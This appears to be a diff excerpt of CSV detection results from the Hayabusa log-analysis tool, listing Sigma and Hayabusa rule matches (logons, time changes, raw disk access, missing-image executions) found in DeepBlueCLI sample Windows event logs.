+2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd99e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd9c6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16559  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16589  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7c0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7f0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf564  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf598  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27008  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27038  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
